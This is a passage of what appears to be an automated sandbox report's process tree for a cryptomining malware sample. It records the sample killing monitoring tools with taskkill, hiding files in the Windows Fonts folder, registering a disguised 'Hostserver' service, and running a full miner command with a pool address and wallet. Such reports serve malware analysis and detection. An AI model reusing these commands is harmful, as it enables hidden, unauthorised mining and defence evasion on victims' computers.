- Kills process with taskkill
PID:1512

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /im procexp.exe /f /T
3⤵
PID:1732

C:\Windows\SysWOW64\taskkill.exe
taskkill /im procexp.exe /f /T
4⤵
- Kills process with taskkill
PID:2336

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /im perfmon.exe /f /T
3⤵
PID:2568

C:\Windows\SysWOW64\taskkill.exe
taskkill /im perfmon.exe /f /T
4⤵
- Kills process with taskkill
PID:4440

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /im autoruns.exe /f /T
3⤵
PID:3828

C:\Windows\SysWOW64\taskkill.exe
taskkill /im autoruns.exe /f /T
4⤵
- Kills process with taskkill
PID:3036

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /im rundll32.exe /f /T
3⤵
PID:3976

C:\Windows\SysWOW64\taskkill.exe
taskkill /im rundll32.exe /f /T
4⤵
- Kills process with taskkill
PID:1828

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /im taskmgr.exe /f /T
3⤵
PID:4492

C:\Windows\SysWOW64\taskkill.exe
taskkill /im taskmgr.exe /f /T
4⤵
- Kills process with taskkill
PID:4960

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:4740

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:2556

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib -s -h -r -a %SystemRoot%\Fonts
3⤵
PID:5044

C:\Windows\SysWOW64\attrib.exe
attrib -s -h -r -a C:\Windows\Fonts
4⤵
PID:3456

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2700

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:1452

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe start Hostserver
3⤵
- Executes dropped EXE
PID:3104

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set Hostserver Description Identify computers that are connected to the network, collect and store the properties of these networks, and notify the application when they are changed.
3⤵
- Executes dropped EXE
PID:1844

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set Hostserver Security Accounts Services
3⤵
- Executes dropped EXE
PID:3684

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe install Hostserver KvMonXP.exe -o stratum+tcp://l.f2pool.info:443 -u 47QrUBQ4ejMW5wrWXiKUyRcQCZszauGWg9c3SLkzFoBJi45M5yN6gVPjVxSUfjMq4u8vepEejdnxyRQcv4RuFGy25x67433 -p x -k --donate-level=1 --print-time=5 --nicehash
3⤵
- Detected Stratum cryptominer command
- Executes dropped EXE
PID:5092

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib -s -h -r -a %SystemRoot%\Fonts
3⤵
PID:4084

C:\Windows\SysWOW64\attrib.exe
attrib -s -h -r -a C:\Windows\Fonts
4⤵
PID:4228

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:4044

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:4804

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2900

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:4020

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2008

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:4132

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:4244

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:3544

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1560

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:4108

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:3348

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:4140

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1784

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:1512

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2264

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:4164

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:5020

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:2744

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2960

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:3984

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:3520

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:2568

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:920

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:2992

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:3916

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:4008

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:5024

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:3692

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:3436

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:2868

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2496

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:1924

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:4804

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:2540

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:4896

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:4216

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:4152

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:2232

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:636

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:4172

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:4308

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:4472

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:4656

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:5012

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:4544

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:680

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:3756

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:4960

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1732

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:2716

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2412

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:3444

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:3016

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:2580

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1492

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:4736

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2552

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:2348

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:3108

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:3668

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:3132

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:2464

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:4008

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:3692

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:3488

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:2868

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2112

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:652

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:4364

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:2948

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1244

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:4964

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:4844

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:3652

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2188

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:1472

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:4248

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:1980

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:4444

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:2276

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:4968

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:3472

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:4136

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:4172

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:452

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:4184

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1540

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:4000

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1684

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:4212

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2004

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:3836

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:4228

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:3476

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:752

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:2656

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:4716

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:1176

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2084

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:3756

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2688

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:3192

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:4196

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:3828

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:620

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:2744

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2892

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:2924

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:5028

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:1536

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2888

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:3528

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1828

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:2248

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:4892

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:3488

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:744

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:2964

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2676

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:4020

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:4044

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:216

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:4896

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:4688

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2648

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:4924

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:3472

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:3544

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:3204

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:4504

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1560

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:4164

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2300

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:4160

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:4780

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:2740

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:4000

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:3616

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:4988

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:2360

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:4288

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:4800

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:3576

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:4348

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:3968

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:4616

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:308

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:4212

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:5064

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:64

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1708

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:2580

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:4492

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:5028

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:4280

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:3248

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:3700

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:3104

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:3436

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:3352

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:3964

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:4600

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:4020

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:4436

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1588

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:2204

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:3300

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:2788

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2760

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:2820

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:5100

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:4248

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2196

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:4996

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:3556

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:1944

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:536

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:3616

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:560

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:864

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:3852

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:1300

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:4432

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:2656

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:4540

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:2264

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:4968

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:4956

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:4272

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:3952

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2328

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:4288

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:4908

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:2304

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:4152

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:2732

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:3184

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:2076

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2004

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:1340

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:3828

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:368

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2292

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:3656

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:5112

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:220

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:64

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:3016

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2580

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:4492

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:4476

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:2548

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:700

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:4264

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:920

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:3912

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2444

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:2112

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:4192

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:4844

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1924

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:216

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1532

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:3684
